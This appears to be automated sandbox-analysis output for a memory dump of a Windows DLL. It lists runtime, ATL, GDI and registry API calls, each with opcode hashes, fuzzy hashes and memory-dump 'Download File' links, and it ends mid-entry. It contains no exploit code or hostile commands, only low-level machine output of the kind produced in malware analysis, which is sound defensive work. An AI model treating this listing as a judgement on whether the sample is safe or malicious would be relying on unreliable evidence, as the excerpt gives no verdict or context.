                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6F230F60
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2326D2
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2326E4
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2326F6
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232708
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F23271A
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F23272C
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F23273E
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232750
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232762
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232774
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232786
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232798
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2327AA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F55
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F77
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F8C
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F97
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FB9
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FCC
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FDA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FE5
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F23101D
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F231024
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F231041
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F231059
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                    • Opcode ID: 112e3bc07400d9cf44ee886cf67bee1007b5d84341bf9c4acc1520e8352221e4
                                                                                                                                                                                                                    • Instruction ID: 9141e6687cb1a912de6b7b19196a51c9bb8731b57a3a3df607677a7acc735c5b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 112e3bc07400d9cf44ee886cf67bee1007b5d84341bf9c4acc1520e8352221e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C231FCB2E0C7199FE7219A79D840B9A73E9EF00719F10941AE469D6690DF75B9808F20
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $Tm"o
                                                                                                                                                                                                                    • API String ID: 0-3147287586
                                                                                                                                                                                                                    • Opcode ID: fb4fd172e80a6a2ab07d875f59a616e578401667dda2bf12f80319a9d7597f19
                                                                                                                                                                                                                    • Instruction ID: 6a598a7147472c2480c6831381e9e22ca7f429d223b5d99a24b56555b41992e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb4fd172e80a6a2ab07d875f59a616e578401667dda2bf12f80319a9d7597f19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05C1AF75F4834EAFDB018FA8C840B9EBBF5BF0A314F114199E914AB681C774A905CF62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                    • Opcode ID: 84c6d08dfe5807896b133b5695a2b84e984bd42883f2b4f5d297da2f495c6cc4
                                                                                                                                                                                                                    • Instruction ID: 116a991ff7837335c0501352a5381a12592f82450adba9fed4e20da88dff2d95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c6d08dfe5807896b133b5695a2b84e984bd42883f2b4f5d297da2f495c6cc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7C111B2D44219AFDB60CBA8DC42FDE77F9AF09704F544165FA04EB6C1D670AA408FA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6F219E57
                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6F219E79
                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6F219F88
                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6F219FD9
                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6F21A05A
                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6F21A0DE
                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6F21A0F9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                    • API String ID: 4234981820-393685449
                                                                                                                                                                                                                    • Opcode ID: 5f635b6c8c9af9e07d094cad06b275084809d6e8b196e75932d968065e592fd7
                                                                                                                                                                                                                    • Instruction ID: d69e1f2550719bf9bcbd88f919f5e705b96a64b74c0960186c1dd828d78b1af9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f635b6c8c9af9e07d094cad06b275084809d6e8b196e75932d968065e592fd7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFB1757180820EAFCF15CFA4C880A9EBBF5BF08315F10415AEA146B655D732EA65CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24BA20), ref: 6F2123C4
                                                                                                                                                                                                                    • GetClassInfoExW.USER32 ref: 6F2123F9
                                                                                                                                                                                                                    • GetClassInfoExW.USER32 ref: 6F21240C
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F212417
                                                                                                                                                                                                                    • LoadCursorW.USER32(6F200000,?), ref: 6F212469
                                                                                                                                                                                                                    • GetClassInfoExW.USER32 ref: 6F2124BF
                                                                                                                                                                                                                    • RegisterClassExW.USER32 ref: 6F2124CF
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F212562
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
                                                                                                                                                                                                                    • String ID: 0$ATL:%p
                                                                                                                                                                                                                    • API String ID: 269841140-2453800769
                                                                                                                                                                                                                    • Opcode ID: 2112cf21bcc9e6a1b9a7b1bfb5a41405681f6541d6ba5cb61e81b1323247cde9
                                                                                                                                                                                                                    • Instruction ID: 064c85aa7b390db74cf9e560578e25c16577cb218439f0a8e286ebf15384db74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2112cf21bcc9e6a1b9a7b1bfb5a41405681f6541d6ba5cb61e81b1323247cde9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A36127B1904B09DBDB24DF68C4945AAB7F5FF4A320B00461DF98A9BA90EB70F494CF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204F7F
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204FA1
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204FC1
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F20512A
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F205142
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F205164
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F205169
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F20516E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                    • API String ID: 3742692055-2658103896
                                                                                                                                                                                                                    • Opcode ID: 61047777feffe17b983b8547c0a04b5ee177f378f59254802f10c197e9d0bebb
                                                                                                                                                                                                                    • Instruction ID: 0b9d5237f5841e34e13af9e186dfc87b657843ff269eb2d2e00f7985cd277f8f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61047777feffe17b983b8547c0a04b5ee177f378f59254802f10c197e9d0bebb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A61EBB1904709CBDB10EFA8C844B9EBBF1FF05718F10815DD805AB680DBB5AA48CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6F20DF2E
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(00000000,?,00000000,00000000), ref: 6F20DF5B
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF74
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF7F
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(00000001,?,00000000,00000000), ref: 6F20DFEE
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,6F244954,?,A9775A74,?,00000000,C000008C,?,00000000,6F237E4B,000000FF,?,6F20F0EE,00000000,00000000,C000008C), ref: 6F20E133
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,6F244958,?,6F20F0EE,00000000,00000000,C000008C,C000008C), ref: 6F20E14A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext$lstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3586774192-0
                                                                                                                                                                                                                    • Opcode ID: 149abcb8d0f81715b65c8fcfb6f0799a6a5c02ba761835baf5cd3a60254717fe
                                                                                                                                                                                                                    • Instruction ID: dc7afc5477434f5b8f2ea9802371096b7ac5beaa96bafec7737ff13cbe15e818
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 149abcb8d0f81715b65c8fcfb6f0799a6a5c02ba761835baf5cd3a60254717fe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47D10573D0062EDBDB24EB24CD59BD9B7B5AF19300F050596EA48A7280E730AED9CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 6F2103C8
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6F2103F5
                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 6F2103FE
                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000), ref: 6F210407
                                                                                                                                                                                                                    • ReleaseDC.USER32 ref: 6F210414
                                                                                                                                                                                                                    • SetTimer.USER32 ref: 6F210429
                                                                                                                                                                                                                      • Part of subcall function 6F211260: BeginPaint.USER32(?,?), ref: 6F2112A3
                                                                                                                                                                                                                      • Part of subcall function 6F211260: GetParent.USER32(?), ref: 6F2112AC
                                                                                                                                                                                                                      • Part of subcall function 6F211260: GetClientRect.USER32 ref: 6F2112C2
                                                                                                                                                                                                                      • Part of subcall function 6F211260: CreateCompatibleDC.GDI32(?), ref: 6F2112C8
                                                                                                                                                                                                                      • Part of subcall function 6F211260: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F2112EA
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SelectObject.GDI32(00000000,00000000), ref: 6F2112F6
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SelectObject.GDI32(00000000,?), ref: 6F211308
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F211321
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F21132F
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SetBkMode.GDI32(?,00000001), ref: 6F211338
                                                                                                                                                                                                                      • Part of subcall function 6F211260: SetTextColor.GDI32(?,00FFFFFF), ref: 6F211344
                                                                                                                                                                                                                      • Part of subcall function 6F211260: GetClientRect.USER32 ref: 6F211356
                                                                                                                                                                                                                      • Part of subcall function 6F211260: ClientToScreen.USER32(?,?), ref: 6F211364
                                                                                                                                                                                                                      • Part of subcall function 6F211260: ClientToScreen.USER32(?,?), ref: 6F211379
                                                                                                                                                                                                                      • Part of subcall function 6F211260: ClientToScreen.USER32(?,?), ref: 6F21139B
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 6F210450
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
                                                                                                                                                                                                                    • String ID: Arial
                                                                                                                                                                                                                    • API String ID: 1525433823-493054409
                                                                                                                                                                                                                    • Opcode ID: 7897d1521ce5fc1df7c15f88c6925f8d4c89bb7907ddb28dbed32b8a1750bd78
                                                                                                                                                                                                                    • Instruction ID: 2b1cebc96198068b6a7388feab9fc380a9e50c46d8d49c4806803c469420d5cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7897d1521ce5fc1df7c15f88c6925f8d4c89bb7907ddb28dbed32b8a1750bd78
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26318F7224460AABEB10DF68DC89B9A77A9FF56322F104012F605DA5D0CBB1F871DF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284DC
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284E8
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284F3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2284FE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228509
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228514
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22851F
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22852A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228535
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228543
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                    • Opcode ID: 766785e798af74863ee0afc0f1c7fcda1797e50efa6c154468efa79327c6fb12
                                                                                                                                                                                                                    • Instruction ID: 72b7b3ee39dbe4b5cd6249ceee74e223d312c7a26f2f44db5ef8bfb61bab98b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 766785e798af74863ee0afc0f1c7fcda1797e50efa6c154468efa79327c6fb12
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6321537690820CEFCB41DF94C880DDE7BB9FF08754F0185A6B5599B661EB31EA548F80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,A9775A74,?,?,?,6F237D10,000000FF), ref: 6F20D3B9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6F20D3C9
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,A9775A74,?,?,?,6F237D10,000000FF), ref: 6F20D429
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6F20D439
                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 6F20D488
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProc$Delete
                                                                                                                                                                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                                                                                                                                                                    • API String ID: 2668475584-1053001802
                                                                                                                                                                                                                    • Opcode ID: cbe46789d803735e66441b9cfd7be054bd6dc804935a275ed6e426150ecbfd5d
                                                                                                                                                                                                                    • Instruction ID: 9b73eb5c7c3dd355a8f26af12efdc441de65d92e6d4a744c3c8bb2ee7f57692c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbe46789d803735e66441b9cfd7be054bd6dc804935a275ed6e426150ecbfd5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C331D777608648EFDB119F58D804F95BBA6FB46B21F40412BEC1493A40DFB6B464CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,6F217398,6F24CB78,?,00000000,?,6F211FFA,?,?,00000000,?,?,C000008C), ref: 6F217064
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6F217398,6F24CB78,?,00000000,?,6F211FFA,?,?,00000000), ref: 6F217079
                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,C000008C), ref: 6F2170F5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                                                                    • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                                                                    • API String ID: 1423960858-1745123996
                                                                                                                                                                                                                    • Opcode ID: 8252a5bbe00e89ea5e5e91c647f141d46d8c6702f315dfb3a870143bf0ec14aa
                                                                                                                                                                                                                    • Instruction ID: 70e151c87475df63afc598a08451f830a73fcccedb79d8f0f830c9f7f4cc1d74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8252a5bbe00e89ea5e5e91c647f141d46d8c6702f315dfb3a870143bf0ec14aa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D201D2B2809B2D6BCF12DA28CC19FC93BA55B53749F000064FD15B7991DFAAD11CCE99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,6F207C75,6F207C77,00000000,00000000,A9775A74,?,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F2175E9
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,6F207C75,?,00000000,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F217664
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6F21766F
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F217698
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F2176A2
                                                                                                                                                                                                                    • GetLastError.KERNEL32(80070057,A9775A74,?,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F2176A7
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F2176BA
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,Function_00018150,6F248928,000000FE,?,6F207C75), ref: 6F2176D0
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F2176E3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1353541977-0
                                                                                                                                                                                                                    • Opcode ID: e094e696e2a90ea59a62d559c571e2189a1e510ebe1187d4e4636efd1c35f96a
